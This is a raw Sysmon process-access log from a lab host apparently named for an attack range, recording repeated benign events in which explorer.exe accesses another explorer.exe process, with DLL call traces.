16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 